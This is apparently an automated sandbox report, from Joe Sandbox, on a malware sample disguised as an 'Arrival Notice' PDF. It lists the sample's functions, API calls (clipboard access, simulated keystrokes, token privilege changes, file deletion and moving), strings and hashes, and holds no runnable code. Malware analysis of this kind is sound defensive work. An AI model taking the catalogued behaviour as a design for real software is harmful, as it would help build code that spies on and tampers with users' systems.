Opcode Fuzzy Hash: 329631b5dd9259bdf5daf42723408d47c8e99824675c7c270618cf2ff4286224
Instruction Fuzzy Hash: 65F0C231520606EADF21AFA48C0679F3AA5BF00314F148415B450AB191C7B98EF6EF81

Function 00244252 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,?,?,?,002439FE,?,00000001), ref: 00244286

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 69c514e6db4cc0ef273cb7d79fedc94bc6c2362f2dc7de317721b627d7745c40
Instruction ID: d0ae6c05368d5fe7580f1bb1e6ba35f13898bbf1aced8c69b337607e74fbf53f
Opcode Fuzzy Hash: 69c514e6db4cc0ef273cb7d79fedc94bc6c2362f2dc7de317721b627d7745c40
Instruction Fuzzy Hash: 99F01571525B02CFCB38EF64E894916BBE4AF043253248A3EF9D682610C7B299A0DF50

Function 002440A7 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 002440C6

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: LongNamePath
String ID:
API String ID: 82841172-0
Opcode ID: d1f9eef5ccf91b33d9ad115000bc46cca0a7152642565bec43b4e5d9089cc2ad
Instruction ID: e0eb750cc46c23803da2c4f119527691e857039f1d0a12cfc3c794783d61bab8
Opcode Fuzzy Hash: d1f9eef5ccf91b33d9ad115000bc46cca0a7152642565bec43b4e5d9089cc2ad
Instruction Fuzzy Hash: BCE0C2366002245BCB11A658DC4AFEA77ADDF88AA0F0900B5F909E7244DAA4A9C18A90

Function 00D08330 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 00D08341

Memory Dump Source

Source File: 00000000.00000002.1787683260.0000000000D06000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D06000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d06000_Arrival Notice_pdf.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: 2bb761a8c1d50aa4f36210b0e2e44151992f40c05cd905eec9060d23a97f800d
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: E7E0E67594020DDFDB00EFB8D54969E7FF4EF04701F100561FD05D2280DA309D509A72

Non-executed Functions

Function 002AF7FF Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 630windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 0025B34E: GetWindowLongW.USER32(?,000000EB), ref: 0025B35F

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?,?), ref: 002AF87D
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 002AF8DC
GetWindowLongW.USER32(?,000000F0), ref: 002AF919
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 002AF940
SendMessageW.USER32 ref: 002AF966
_wcsncpy.LIBCMT ref: 002AF9D2
GetKeyState.USER32(00000011), ref: 002AF9F3
GetKeyState.USER32(00000009), ref: 002AFA00
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 002AFA16
GetKeyState.USER32(00000010), ref: 002AFA20
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 002AFA4F
SendMessageW.USER32 ref: 002AFA72
SendMessageW.USER32(?,00001030,?,002AE059), ref: 002AFB6F
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?,?), ref: 002AFB85
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 002AFB96
SetCapture.USER32(?), ref: 002AFB9F
ClientToScreen.USER32(?,?), ref: 002AFC03
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 002AFC0F
InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 002AFC29
ReleaseCapture.USER32 ref: 002AFC34
GetCursorPos.USER32(?), ref: 002AFC69
ScreenToClient.USER32(?,?), ref: 002AFC76
SendMessageW.USER32(?,00001012,00000000,?), ref: 002AFCD8
SendMessageW.USER32 ref: 002AFD02
SendMessageW.USER32(?,00001111,00000000,?), ref: 002AFD41
SendMessageW.USER32 ref: 002AFD6C
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 002AFD84
SendMessageW.USER32(?,0000110B,00000009,?), ref: 002AFD8F
GetCursorPos.USER32(?), ref: 002AFDB0
ScreenToClient.USER32(?,?), ref: 002AFDBD
GetParent.USER32(?), ref: 002AFDD9
SendMessageW.USER32(?,00001012,00000000,?), ref: 002AFE3F
SendMessageW.USER32 ref: 002AFE6F
ClientToScreen.USER32(?,?), ref: 002AFEC5
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 002AFEF1
SendMessageW.USER32(?,00001111,00000000,?), ref: 002AFF19
SendMessageW.USER32 ref: 002AFF3C
ClientToScreen.USER32(?,?), ref: 002AFF86
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 002AFFB6
GetWindowLongW.USER32(?,000000F0), ref: 002B004B

Strings

F, xrefs: 002AFF42
@GUI_DRAGID, xrefs: 002AFBCC

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: MessageSend$ClientScreen$Image$CursorDragList_LongStateWindow$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
String ID: @GUI_DRAGID$F
API String ID: 2516578528-4164748364
Opcode ID: 85dcf07f2e7a9389acef353056240c39bfb92305f3e5e2b72216d5de9730472b
Instruction ID: 0e7154a527cf4713ef7960f372eb0af73b493126010e24ac6ba5c6b014b7d6bc
Opcode Fuzzy Hash: 85dcf07f2e7a9389acef353056240c39bfb92305f3e5e2b72216d5de9730472b
Instruction Fuzzy Hash: 0232F270514305EFDB21CFA4C984FAABBA8FF4A344F140629F595872A1CB79DC24CB51

Function 002AAACE Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 574windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000400,00000000,00000000), ref: 002AB1CD

Strings

%d/%02d/%02d, xrefs: 002AAEFC

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: MessageSend
String ID: %d/%02d/%02d
API String ID: 3850602802-328681919
Opcode ID: a78ad2375fdd584bc5e0627faeb84bc3a029696c8fd72c31ec51f96f8c572de2
Instruction ID: 2071d0440d6e35a1630ea5e96c011d4ea1717d95c16136b92dfa9c5451763287
Opcode Fuzzy Hash: a78ad2375fdd584bc5e0627faeb84bc3a029696c8fd72c31ec51f96f8c572de2
Instruction Fuzzy Hash: 6E12CE71520309ABEB258F64DC49FAE7BB8FF46710F204129FA19DB2D1DBB18951CB11

Function 0025EB42 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,00000000), ref: 0025EB4A
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 002B3AEA
IsIconic.USER32(000000FF), ref: 002B3AF3
ShowWindow.USER32(000000FF,00000009), ref: 002B3B00
SetForegroundWindow.USER32(000000FF), ref: 002B3B0A
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 002B3B20
GetCurrentThreadId.KERNEL32 ref: 002B3B27
GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 002B3B33
AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 002B3B44
AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 002B3B4C
AttachThreadInput.USER32(00000000,?,00000001), ref: 002B3B54
SetForegroundWindow.USER32(000000FF), ref: 002B3B57
MapVirtualKeyW.USER32(00000012,00000000), ref: 002B3B6C
keybd_event.USER32(00000012,00000000), ref: 002B3B77
MapVirtualKeyW.USER32(00000012,00000000), ref: 002B3B81
keybd_event.USER32(00000012,00000000), ref: 002B3B86
MapVirtualKeyW.USER32(00000012,00000000), ref: 002B3B8F
keybd_event.USER32(00000012,00000000), ref: 002B3B94
MapVirtualKeyW.USER32(00000012,00000000), ref: 002B3B9E
keybd_event.USER32(00000012,00000000), ref: 002B3BA3
SetForegroundWindow.USER32(000000FF), ref: 002B3BA6
AttachThreadInput.USER32(000000FF,?,00000000), ref: 002B3BCD

Strings

Shell_TrayWnd, xrefs: 002B3AE5

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: 634c9d53eff2c3c2940060870b781d499cf92f41533974c9aaac8b24b7904de6
Instruction ID: 148f92a59c06eaddffac884e12d701462f0428bd2a09ceb5a59ea72842789376
Opcode Fuzzy Hash: 634c9d53eff2c3c2940060870b781d499cf92f41533974c9aaac8b24b7904de6
Instruction Fuzzy Hash: 0331A771A503187BEB205F65AC4DFBF7E6CEB84B94F104025FA05EA1D0D6B05D10EAA0

Function 0027ACC5 Relevance: 37.0, APIs: 17, Strings: 4, Instructions: 223COMMON

Download Yara Rule

APIs

Part of subcall function 0027B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0027B180
Part of subcall function 0027B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0027B1AD
Part of subcall function 0027B134: GetLastError.KERNEL32 ref: 0027B1BA

_memset.LIBCMT ref: 0027AD08
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 0027AD5A
CloseHandle.KERNEL32(?), ref: 0027AD6B
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 0027AD82
GetProcessWindowStation.USER32 ref: 0027AD9B
SetProcessWindowStation.USER32(00000000), ref: 0027ADA5
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0027ADBF

Part of subcall function 0027AB84: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0027ACC0), ref: 0027AB99
Part of subcall function 0027AB84: CloseHandle.KERNEL32(?,?,0027ACC0), ref: 0027ABAB

Strings

H*/, xrefs: 0027AE40
winsta0, xrefs: 0027AD7D
, xrefs: 0027AD17
default, xrefs: 0027ADBA

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
String ID: $H*/$default$winsta0
API String ID: 2063423040-3152231795
Opcode ID: c76d5338e69b06f28ead0b233de72e92d9778fa7bbad5e491ef1a2f802280da2
Instruction ID: 75830c48a0e5d83446c3670ca89a5c21298f77fd5f2ffb950f76dda685cb52ff
Opcode Fuzzy Hash: c76d5338e69b06f28ead0b233de72e92d9778fa7bbad5e491ef1a2f802280da2
Instruction Fuzzy Hash: 45819E7182020AAFDF119FA4DC49EEEBB78FF45314F148129F918A21A1D7318E64DF62

Function 002860DD Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 174filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00286EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00285FA6,?), ref: 00286ED8

Part of subcall function 00286EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00285FA6,?), ref: 00286EF1

Part of subcall function 0028725E: __wsplitpath.LIBCMT ref: 0028727B
Part of subcall function 0028725E: __wsplitpath.LIBCMT ref: 0028728E

Part of subcall function 002872CB: GetFileAttributesW.KERNEL32(?,00286019), ref: 002872CC

_wcscat.LIBCMT ref: 00286149
_wcscat.LIBCMT ref: 00286167
__wsplitpath.LIBCMT ref: 0028618E
FindFirstFileW.KERNEL32(?,?), ref: 002861A4
_wcscpy.LIBCMT ref: 00286209
_wcscat.LIBCMT ref: 0028621C
_wcscat.LIBCMT ref: 0028622F
lstrcmpiW.KERNEL32(?,?), ref: 0028625D
DeleteFileW.KERNEL32(?), ref: 0028626E
MoveFileW.KERNEL32(?,?), ref: 00286289
MoveFileW.KERNEL32(?,?), ref: 00286298
CopyFileW.KERNEL32(?,?,00000000), ref: 002862AD
DeleteFileW.KERNEL32(?), ref: 002862BE
FindNextFileW.KERNEL32(00000000,00000010), ref: 002862E1
FindClose.KERNEL32(00000000), ref: 002862FD
FindClose.KERNEL32(00000000), ref: 0028630B

Strings

\*.*, xrefs: 00286138, 00286147, 00286165

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
String ID: \*.*
API String ID: 1917200108-1173974218
Opcode ID: df2745430792d1483ca17dd5142758276ca68d1fcfda88623c85848cf7f12e4b
Instruction ID: 2f6ba0b949b689093d908d0e8283fde6816dc3e6726c85a8aeaae2aed0b69b19
Opcode Fuzzy Hash: df2745430792d1483ca17dd5142758276ca68d1fcfda88623c85848cf7f12e4b
Instruction Fuzzy Hash: C251617681911C6ACB21FB91DC48DEFB7BCAF04300F0900EAE549E3141DE72A7998FA5

Function 00296B0C Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(002DDC00), ref: 00296B36
IsClipboardFormatAvailable.USER32(0000000D), ref: 00296B44
GetClipboardData.USER32(0000000D), ref: 00296B4C
CloseClipboard.USER32 ref: 00296B58
GlobalLock.KERNEL32(00000000), ref: 00296B74
CloseClipboard.USER32 ref: 00296B7E
GlobalUnlock.KERNEL32(00000000), ref: 00296B93
IsClipboardFormatAvailable.USER32(00000001), ref: 00296BA0
GetClipboardData.USER32(00000001), ref: 00296BA8
GlobalLock.KERNEL32(00000000), ref: 00296BB5
GlobalUnlock.KERNEL32(00000000), ref: 00296BE9
CloseClipboard.USER32 ref: 00296CF6

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
String ID:
API String ID: 3222323430-0
Opcode ID: 17df3b77d6c73ad44dd5265593f02861cc6d3e17532d6955b36140b00640eed2
Instruction ID: 0799c4f8421ff23f0dad4d61a30d6f7631be4839a6733f66c11c157550fa8d7e
Opcode Fuzzy Hash: 17df3b77d6c73ad44dd5265593f02861cc6d3e17532d6955b36140b00640eed2
Instruction Fuzzy Hash: 2C519131210202ABD714AF64ED5EF6E77E8EF84B04F10442AF986E61E1EF70D915CB62

Function 0028F5FA Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 278timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 0028F62B
FindClose.KERNEL32(00000000), ref: 0028F67F
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0028F6A4
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0028F6BB
FileTimeToSystemTime.KERNEL32(?,?), ref: 0028F6E2
__swprintf.LIBCMT ref: 0028F72E
__swprintf.LIBCMT ref: 0028F767
__swprintf.LIBCMT ref: 0028F7BB

Part of subcall function 0026172B: __woutput_l.LIBCMT ref: 00261784

__swprintf.LIBCMT ref: 0028F809
__swprintf.LIBCMT ref: 0028F858
__swprintf.LIBCMT ref: 0028F8A7
__swprintf.LIBCMT ref: 0028F8F6

Strings

%02d, xrefs: 0028F7B0, 0028F7B9, 0028F807, 0028F856, 0028F8A5, 0028F8F4
%4d%02d%02d%02d%02d%02d, xrefs: 0028F728
%4d, xrefs: 0028F761

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 835046349-2428617273
Opcode ID: 177802f89077f7f60304c9b9b81eb6e9bd3a24e27bb835963cca6285729ea42c
Instruction ID: ddbcf4ecc1f22ea45869e969959d1ea68bb396aa3b52685f6681b6c2fd2204ef
Opcode Fuzzy Hash: 177802f89077f7f60304c9b9b81eb6e9bd3a24e27bb835963cca6285729ea42c
Instruction Fuzzy Hash: 8DA14272414344ABC354EF94C885DAFB7ECEF99704F44092EF585C2192EB34E969CB62

Function 00291B2F Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 118fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00291B50
_wcscmp.LIBCMT ref: 00291B65
_wcscmp.LIBCMT ref: 00291B7C
GetFileAttributesW.KERNEL32(?), ref: 00291B8E
SetFileAttributesW.KERNEL32(?,?), ref: 00291BA8
FindNextFileW.KERNEL32(00000000,?), ref: 00291BC0
FindClose.KERNEL32(00000000), ref: 00291BCB
FindFirstFileW.KERNEL32(*.*,?), ref: 00291BE7
_wcscmp.LIBCMT ref: 00291C0E
_wcscmp.LIBCMT ref: 00291C25
SetCurrentDirectoryW.KERNEL32(?), ref: 00291C37
SetCurrentDirectoryW.KERNEL32(002F39FC), ref: 00291C55
FindNextFileW.KERNEL32(00000000,00000010), ref: 00291C5F
FindClose.KERNEL32(00000000), ref: 00291C6C
FindClose.KERNEL32(00000000), ref: 00291C7C

Strings

*.*, xrefs: 00291BE2

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1803514871-438819550
Opcode ID: db2e360a4529fc279b18ae572f875841e6d0cf216ddc7df621578456f20b15fe
Instruction ID: 5ecc0fcd3dddc4818d98a92f614d911056ce79e4f36f50661dfff2a17a03ec58
Opcode Fuzzy Hash: db2e360a4529fc279b18ae572f875841e6d0cf216ddc7df621578456f20b15fe
Instruction Fuzzy Hash: 5B31C33255021B6ADF10EFB1EC49EEE77AC9F05324F1441A6E905D2090EBB0DAB58A64

Function 00291C8A Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 111fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00291CAB
_wcscmp.LIBCMT ref: 00291CC0
_wcscmp.LIBCMT ref: 00291CD7

Part of subcall function 00286BD4: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00286BEF

FindNextFileW.KERNEL32(00000000,?), ref: 00291D06
FindClose.KERNEL32(00000000), ref: 00291D11
FindFirstFileW.KERNEL32(*.*,?), ref: 00291D2D
_wcscmp.LIBCMT ref: 00291D54
_wcscmp.LIBCMT ref: 00291D6B
SetCurrentDirectoryW.KERNEL32(?), ref: 00291D7D
SetCurrentDirectoryW.KERNEL32(002F39FC), ref: 00291D9B
FindNextFileW.KERNEL32(00000000,00000010), ref: 00291DA5
FindClose.KERNEL32(00000000), ref: 00291DB2
FindClose.KERNEL32(00000000), ref: 00291DC2

Strings

*.*, xrefs: 00291D28

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 1824444939-438819550
Opcode ID: 5d6ee7f91ece3624bd90fb1309fb68abd83e7d669e333289f484b13ae1a145e4
Instruction ID: df682216b6f8bd087d187d49fd52b749ff5ca6d364a06ed725b95079d03ced66
Opcode Fuzzy Hash: 5d6ee7f91ece3624bd90fb1309fb68abd83e7d669e333289f484b13ae1a145e4
Instruction Fuzzy Hash: A031043251061B6ADF10EFA1EC49EEEB7AC9F05324F140566E801E3190DBB0DEB5CEA4

Function 00247D19 Relevance: 23.7, APIs: 2, Strings: 11, Instructions: 962COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00247DBD

Strings

\, xrefs: 00247D89
^, xrefs: 00247D96
Q\E, xrefs: 002486D6
\b(?<=\w), xrefs: 002BF877
\b(?=\w), xrefs: 002BF85E
\, xrefs: 002BF95B
], xrefs: 00247D9F
[:<:]], xrefs: 00247D1D
[:>:]], xrefs: 00247D37
[, xrefs: 00247E14
\, xrefs: 00247E1D

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: _memset
String ID: Q\E$[$[:<:]]$[:>:]]$\$\$\$\b(?<=\w)$\b(?=\w)$]$^
API String ID: 2102423945-2023335898
Opcode ID: cabaee78120508b3b8699aa856b32dbc8812eb66a280d5ce57ce120930c8a276
Instruction ID: 549e3b6101ce760b090cbdbf942d6c292686015df468e6bbb3aea5406c5bbb43
Opcode Fuzzy Hash: cabaee78120508b3b8699aa856b32dbc8812eb66a280d5ce57ce120930c8a276
Instruction Fuzzy Hash: 2382C171D2421ACBCB28CF98C9807EDBBB1FF48354F258169D819AB251E7709DA5CB90

Function 0029091D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 002909DF
SystemTimeToFileTime.KERNEL32(?,?), ref: 002909EF
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 002909FB
__wsplitpath.LIBCMT ref: 00290A59
_wcscat.LIBCMT ref: 00290A71
_wcscat.LIBCMT ref: 00290A83
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00290A98
SetCurrentDirectoryW.KERNEL32(?), ref: 00290AAC
SetCurrentDirectoryW.KERNEL32(?), ref: 00290ADE
